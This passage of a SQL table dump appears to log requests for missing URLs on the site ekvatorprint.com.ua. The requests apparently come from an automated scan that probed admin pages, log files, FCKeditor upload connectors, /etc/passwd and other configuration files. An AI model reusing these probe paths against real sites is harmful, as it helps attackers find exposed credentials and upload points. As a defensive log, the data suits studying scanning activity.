00:00:00',301),(6590,'http://ekvatorprint.com.ua/ecosystem.json',NULL,'','',1,0,'2017-01-20 13:28:18','0000-00-00 00:00:00',301),(6591,'http://ekvatorprint.com.ua/editors/FCKeditor',NULL,'','',1,0,'2017-01-20 13:28:18','0000-00-00 00:00:00',301),(6592,'http://ekvatorprint.com.ua/editor',NULL,'','',1,0,'2017-01-20 13:28:18','0000-00-00 00:00:00',301),(6593,'http://ekvatorprint.com.ua/editor/tiny_mce/',NULL,'','',1,0,'2017-01-20 13:28:18','0000-00-00 00:00:00',301),(6594,'http://ekvatorprint.com.ua/edit',NULL,'','',1,0,'2017-01-20 13:28:18','0000-00-00 00:00:00',301),(6595,'http://ekvatorprint.com.ua/editor/tiny_mce',NULL,'','',1,0,'2017-01-20 13:28:18','0000-00-00 00:00:00',301),(6596,'http://ekvatorprint.com.ua/editor/tinymce/',NULL,'','',1,0,'2017-01-20 13:28:18','0000-00-00 00:00:00',301),(6597,'http://ekvatorprint.com.ua/editsiteadmin.',NULL,'','',1,0,'2017-01-20 13:28:18','0000-00-00 00:00:00',301),(6598,'http://ekvatorprint.com.ua/editor/FCKeditor',NULL,'','',1,0,'2017-01-20 13:28:18','0000-00-00 00:00:00',301),(6599,'http://ekvatorprint.com.ua/editor/tinymce',NULL,'','',1,0,'2017-01-20 13:28:18','0000-00-00 00:00:00',301),(6600,'http://ekvatorprint.com.ua/editor.php',NULL,'','',1,0,'2017-01-20 13:28:18','0000-00-00 00:00:00',301),(6601,'http://ekvatorprint.com.ua/editsiteadmin.php',NULL,'','',1,0,'2017-01-20 13:28:18','0000-00-00 00:00:00',301),(6602,'http://ekvatorprint.com.ua/ehthumbs.db',NULL,'','',1,0,'2017-01-20 13:28:18','0000-00-00 00:00:00',301),(6603,'http://ekvatorprint.com.ua/email',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6604,'http://ekvatorprint.com.ua/ejb',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6605,'http://ekvatorprint.com.ua/editsiteadmins.php',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6606,'http://ekvatorprint.com.ua/editsiteadmins.',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6607,'http://ekvatorprint.com.ua/education',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6608,'http://ekvatorprint.com.ua/elfinder/elfinder.php',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6609,'http://ekvatorprint.com.ua/ejbSimpappServlet',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6610,'http://ekvatorprint.com.ua/email.htm',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6611,'http://ekvatorprint.com.ua/elmah.axd',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6612,'http://ekvatorprint.com.ua/emailbox',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6613,'http://ekvatorprint.com.ua/ekw_admin',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6614,'http://ekvatorprint.com.ua/en',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6615,'http://ekvatorprint.com.ua/emailtofriend.php',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6616,'http://ekvatorprint.com.ua/email_admin',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6617,'http://ekvatorprint.com.ua/eng',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6618,'http://ekvatorprint.com.ua/emailtofriend.',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6619,'http://ekvatorprint.com.ua/emailadmin',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6620,'http://ekvatorprint.com.ua/emerils-admin',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6621,'http://ekvatorprint.com.ua/en/admin/',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6622,'http://ekvatorprint.com.ua/employment',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6623,'http://ekvatorprint.com.ua/engine',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6624,'http://ekvatorprint.com.ua/engine/classes/swfupload/swfupload_f9.swf',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6625,'http://ekvatorprint.com.ua/engine/classes/swfupload//swfupload_f9.swf',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6626,'http://ekvatorprint.com.ua/engine/classes/swfupload//swfupload.swf',NULL,'','',1,0,'2017-01-20 13:28:19','0000-00-00 00:00:00',301),(6627,'http://ekvatorprint.com.ua/english',NULL,'','',1,0,'2017-01-20 13:28:20','0000-00-00 00:00:00',301),(6628,'http://ekvatorprint.com.ua/enteradmin',NULL,'','',1,0,'2017-01-20 13:28:20','0000-00-00 00:00:00',301),(6629,'http://ekvatorprint.com.ua/engine/classes/swfupload/swfupload.swf',NULL,'','',1,0,'2017-01-20 13:28:20','0000-00-00 00:00:00',301),(6630,'http://ekvatorprint.com.ua/environment.rb',NULL,'','',1,0,'2017-01-20 13:28:20','0000-00-00 00:00:00',301),(6631,'http://ekvatorprint.com.ua/err',NULL,'','',1,0,'2017-01-20 13:28:20','0000-00-00 00:00:00',301),(6632,'http://ekvatorprint.com.ua/enterprise',NULL,'','',1,0,'2017-01-20 13:28:20','0000-00-00 00:00:00',301),(6633,'http://ekvatorprint.com.ua/error',NULL,'','',1,0,'2017-01-20 13:28:20','0000-00-00 00:00:00',301),(6634,'http://ekvatorprint.com.ua/epsadmin',NULL,'','',1,0,'2017-01-20 13:28:20','0000-00-00 00:00:00',301),(6635,'http://ekvatorprint.com.ua/entertainment',NULL,'','',1,0,'2017-01-20 13:28:20','0000-00-00 00:00:00',301),(6636,'http://ekvatorprint.com.ua/error.asp',NULL,'','',1,0,'2017-01-20 13:28:20','0000-00-00 00:00:00',301),(6637,'http://ekvatorprint.com.ua/error-log.txt',NULL,'','',1,0,'2017-01-20 13:28:20','0000-00-00 00:00:00',301),(6638,'http://ekvatorprint.com.ua/error-log',NULL,'','',1,0,'2017-01-20 13:28:20','0000-00-00 00:00:00',301),(6639,'http://ekvatorprint.com.ua/error.cpp',NULL,'','',1,0,'2017-01-20 13:28:20','0000-00-00 00:00:00',301),(6640,'http://ekvatorprint.com.ua/error.ctp',NULL,'','',1,0,'2017-01-20 13:28:20','0000-00-00 00:00:00',301),(6641,'http://ekvatorprint.com.ua/error.ini',NULL,'','',1,0,'2017-01-20 13:28:20','0000-00-00 00:00:00',301),(6642,'http://ekvatorprint.com.ua/error.html',NULL,'','',1,0,'2017-01-20 13:28:20','0000-00-00 00:00:00',301),(6643,'http://ekvatorprint.com.ua/error.jsp',NULL,'','',1,0,'2017-01-20 13:28:20','0000-00-00 00:00:00',301),(6644,'http://ekvatorprint.com.ua/error.log',NULL,'','',1,0,'2017-01-20 13:28:20','0000-00-00 00:00:00',301),(6645,'http://ekvatorprint.com.ua/error.tmpl',NULL,'','',1,0,'2017-01-20 13:28:20','0000-00-00 00:00:00',301),(6646,'http://ekvatorprint.com.ua/error.log.0',NULL,'','',1,0,'2017-01-20 13:28:20','0000-00-00 00:00:00',301),(6647,'http://ekvatorprint.com.ua/error.tpl',NULL,'','',1,0,'2017-01-20 13:28:20','0000-00-00 00:00:00',301),(6648,'http://ekvatorprint.com.ua/error404.htm',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6649,'http://ekvatorprint.com.ua/error.xml',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6650,'http://ekvatorprint.com.ua/error/',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6651,'http://ekvatorprint.com.ua/error_log',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6652,'http://ekvatorprint.com.ua/errorlog',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6653,'http://ekvatorprint.com.ua/error.txt',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6654,'http://ekvatorprint.com.ua/errorPages',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6655,'http://ekvatorprint.com.ua/error_log.txt',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6656,'http://ekvatorprint.com.ua/error1.tpl',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6657,'http://ekvatorprint.com.ua/error_log.gz',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6658,'http://ekvatorprint.com.ua/errors',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6659,'http://ekvatorprint.com.ua/errors/',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6660,'http://ekvatorprint.com.ua/errors.asp',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6661,'http://ekvatorprint.com.ua/errors/creation',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6662,'http://ekvatorprint.com.ua/errors.tpl',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6663,'http://ekvatorprint.com.ua/errors.txt',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6664,'http://ekvatorprint.com.ua/errors.log',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6665,'http://ekvatorprint.com.ua/errors/local.xml',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6666,'http://ekvatorprint.com.ua/es',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6667,'http://ekvatorprint.com.ua/esadmin',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6668,'http://ekvatorprint.com.ua/esiInavlidator',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6669,'http://ekvatorprint.com.ua/estore/index.html',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6670,'http://ekvatorprint.com.ua/estore/populate',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6671,'http://ekvatorprint.com.ua/etc/passwd',NULL,'','',1,0,'2017-01-20 13:28:21','0000-00-00 00:00:00',301),(6672,'http://ekvatorprint.com.ua/estore',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6673,'http://ekvatorprint.com.ua/estore/annotated-index.html',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6674,'http://ekvatorprint.com.ua/etc/database.xml',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6675,'http://ekvatorprint.com.ua/etc/config.ini',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6676,'http://ekvatorprint.com.ua/etc/hosts',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6677,'http://ekvatorprint.com.ua/etc',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6678,'http://ekvatorprint.com.ua/eticket',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6679,'http://ekvatorprint.com.ua/eudora.ini',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6680,'http://ekvatorprint.com.ua/eula.txt',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6681,'http://ekvatorprint.com.ua/eula_en.txt',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6682,'http://ekvatorprint.com.ua/events_admin',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6683,'http://ekvatorprint.com.ua/events',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6684,'http://ekvatorprint.com.ua/examadmin',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6685,'http://ekvatorprint.com.ua/example.php',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6686,'http://ekvatorprint.com.ua/examples/',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6687,'http://ekvatorprint.com.ua/examples',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6688,'http://ekvatorprint.com.ua/examples/servlets/index.html',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6689,'http://ekvatorprint.com.ua/examplesWebApp/InteractiveQuery.jsp',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6690,'http://ekvatorprint.com.ua/examplesWebApp/OrderParser.jsp',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6691,'http://ekvatorprint.com.ua/examplesWebApp/EJBeanManagedClient.jsp',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6692,'http://ekvatorprint.com.ua/examplesWebApp/SessionServlet',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6693,'http://ekvatorprint.com.ua/exchange/logon.php',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6694,'http://ekvatorprint.com.ua/examplesWebApp/WebservicesEJB.jsp',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6695,'http://ekvatorprint.com.ua/examplesWebApp/index.jsp',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6696,'http://ekvatorprint.com.ua/exchange/logon.',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6697,'http://ekvatorprint.com.ua/expadmin',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6698,'http://ekvatorprint.com.ua/export',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6699,'http://ekvatorprint.com.ua/exchange/root.php',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6700,'http://ekvatorprint.com.ua/expressInstall.swf',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6701,'http://ekvatorprint.com.ua/f94admin',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6702,'http://ekvatorprint.com.ua/exchange/root.',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6703,'http://ekvatorprint.com.ua/ezadmin',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6704,'http://ekvatorprint.com.ua/f',NULL,'','',1,0,'2017-01-20 13:28:22','0000-00-00 00:00:00',301),(6705,'http://ekvatorprint.com.ua/extra_admin',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6706,'http://ekvatorprint.com.ua/f___admin',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6707,'http://ekvatorprint.com.ua/faq_admin.',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6708,'http://ekvatorprint.com.ua/faculty',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6709,'http://ekvatorprint.com.ua/faq_admin.php',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6710,'http://ekvatorprint.com.ua/fantastico_fileslist.txt',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6711,'http://ekvatorprint.com.ua/fadmin',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6712,'http://ekvatorprint.com.ua/faq',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6713,'http://ekvatorprint.com.ua/faqs',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6714,'http://ekvatorprint.com.ua/fault',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6715,'http://ekvatorprint.com.ua/fcgi-bin',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6716,'http://ekvatorprint.com.ua/fcadmin',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6717,'http://ekvatorprint.com.ua/fck',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6718,'http://ekvatorprint.com.ua/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6719,'http://ekvatorprint.com.ua/fcgi-bin/',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6720,'http://ekvatorprint.com.ua/fckeditor',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6721,'http://ekvatorprint.com.ua/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6722,'http://ekvatorprint.com.ua/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6723,'http://ekvatorprint.com.ua/fckeditor/editor/filemanager/connectors/asp/connector.asp',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6724,'http://ekvatorprint.com.ua/fckeditor/editor/filemanager/connectors/aspx/connector.aspx',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6725,'http://ekvatorprint.com.ua/fckeditor/editor/filemanager/connectors/asp/upload.asp',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6726,'http://ekvatorprint.com.ua/fckeditor/editor/filemanager/connectors/aspx/upload.aspx',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6727,'http://ekvatorprint.com.ua/fckeditor/editor/filemanager/connectors/php/upload.php',NULL,'','',6,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6728,'http://ekvatorprint.com.ua/fckeditor/editor/filemanager/upload/aspx/upload.aspx',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6729,'http://ekvatorprint.com.ua/fckeditor/editor/filemanager/connectors/php/connector.php',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6730,'http://ekvatorprint.com.ua/fckeditor/editor/filemanager/upload/asp/upload.asp',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6731,'http://ekvatorprint.com.ua/fckeditor/editor/filemanager/upload/php/upload.php',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6732,'http://ekvatorprint.com.ua/features',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6733,'http://ekvatorprint.com.ua/feedback',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6734,'http://ekvatorprint.com.ua/feed',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6735,'http://ekvatorprint.com.ua/feeds',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6736,'http://ekvatorprint.com.ua/file',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6737,'http://ekvatorprint.com.ua/fileRealm',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6738,'http://ekvatorprint.com.ua/file/',NULL,'','',1,0,'2017-01-20 13:28:23','0000-00-00 00:00:00',301),(6739,'http://ekvatorprint.com.ua/fileRealm.properties',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6740,'http://ekvatorprint.com.ua/file_manager',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6741,'http://ekvatorprint.com.ua/file_upload',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6742,'http://ekvatorprint.com.ua/file_manager/',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6743,'http://ekvatorprint.com.ua/file_upload.asp',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6744,'http://ekvatorprint.com.ua/file_upload.aspx',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6745,'http://ekvatorprint.com.ua/file_upload.cfm',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6746,'http://ekvatorprint.com.ua/file_upload.html',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6747,'http://ekvatorprint.com.ua/file_upload.htm',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6748,'http://ekvatorprint.com.ua/file_upload.php',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6749,'http://ekvatorprint.com.ua/file_upload.php3',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6750,'http://ekvatorprint.com.ua/file_upload/',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6751,'http://ekvatorprint.com.ua/file_upload.shtm',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6752,'http://ekvatorprint.com.ua/fileadmin.php',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6753,'http://ekvatorprint.com.ua/fileadmin',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6754,'http://ekvatorprint.com.ua/fileadmin/',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6755,'http://ekvatorprint.com.ua/filedump/',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6756,'http://ekvatorprint.com.ua/filemanager',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6757,'http://ekvatorprint.com.ua/filemanager/',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6758,'http://ekvatorprint.com.ua/files',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6759,'http://ekvatorprint.com.ua/files.md5',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6760,'http://ekvatorprint.com.ua/fileserver',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6761,'http://ekvatorprint.com.ua/fileupload',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6762,'http://ekvatorprint.com.ua/fileupload/',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6763,'http://ekvatorprint.com.ua/flags',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6764,'http://ekvatorprint.com.ua/fkadmin',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6765,'http://ekvatorprint.com.ua/flashFXP.ini',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6766,'http://ekvatorprint.com.ua/flash',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6767,'http://ekvatorprint.com.ua/folder',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6768,'http://ekvatorprint.com.ua/fonts',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6769,'http://ekvatorprint.com.ua/footer',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6770,'http://ekvatorprint.com.ua/footer_admin.php',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6771,'http://ekvatorprint.com.ua/footer_admin.',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6772,'http://ekvatorprint.com.ua/forgot_pass.php',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6773,'http://ekvatorprint.com.ua/forgot',NULL,'','',1,0,'2017-01-20 13:28:24','0000-00-00 00:00:00',301),(6774,'http://ekvatorprint.com.ua/formmail',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6775,'http://ekvatorprint.com.ua/formadmin',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6776,'http://ekvatorprint.com.ua/forgot_pass.',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6777,'http://ekvatorprint.com.ua/formsadmin',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6778,'http://ekvatorprint.com.ua/forms',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6779,'http://ekvatorprint.com.ua/forum',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6780,'http://ekvatorprint.com.ua/forum.',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6781,'http://ekvatorprint.com.ua/forum.rar',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6782,'http://ekvatorprint.com.ua/forum.tar.gz',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6783,'http://ekvatorprint.com.ua/example',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6784,'http://ekvatorprint.com.ua/forum.tar',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6785,'http://ekvatorprint.com.ua/forum.sql',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6786,'http://ekvatorprint.com.ua/forum.zip',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6787,'http://ekvatorprint.com.ua/forum/admin/',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6788,'http://ekvatorprint.com.ua/forum/install/install.php',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6789,'http://ekvatorprint.com.ua/forum_admin',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6790,'http://ekvatorprint.com.ua/forum_arc.php',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6791,'http://ekvatorprint.com.ua/forum_professionnel.php',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6792,'http://ekvatorprint.com.ua/forum_arc.',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6793,'http://ekvatorprint.com.ua/forum_professionnel.',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6794,'http://ekvatorprint.com.ua/fr',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6795,'http://ekvatorprint.com.ua/forumdisplay',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6796,'http://ekvatorprint.com.ua/forums/cache/db_update.lock',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6797,'http://ekvatorprint.com.ua/forumadmin',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6798,'http://ekvatorprint.com.ua/forums',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6799,'http://ekvatorprint.com.ua/fpadmin',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6800,'http://ekvatorprint.com.ua/freshadmin',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6801,'http://ekvatorprint.com.ua/free',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6802,'http://ekvatorprint.com.ua/freemail',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6803,'http://ekvatorprint.com.ua/ftp.txt',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6804,'http://ekvatorprint.com.ua/ftp',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6805,'http://ekvatorprint.com.ua/funcion/',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6806,'http://ekvatorprint.com.ua/frontend_admin',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6807,'http://ekvatorprint.com.ua/full',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6808,'http://ekvatorprint.com.ua/funciones.php',NULL,'','',1,0,'2017-01-20 13:28:25','0000-00-00 00:00:00',301),(6809,'http://ekvatorprint.com.ua/fzadmin',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6810,'http://ekvatorprint.com.ua/functions',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 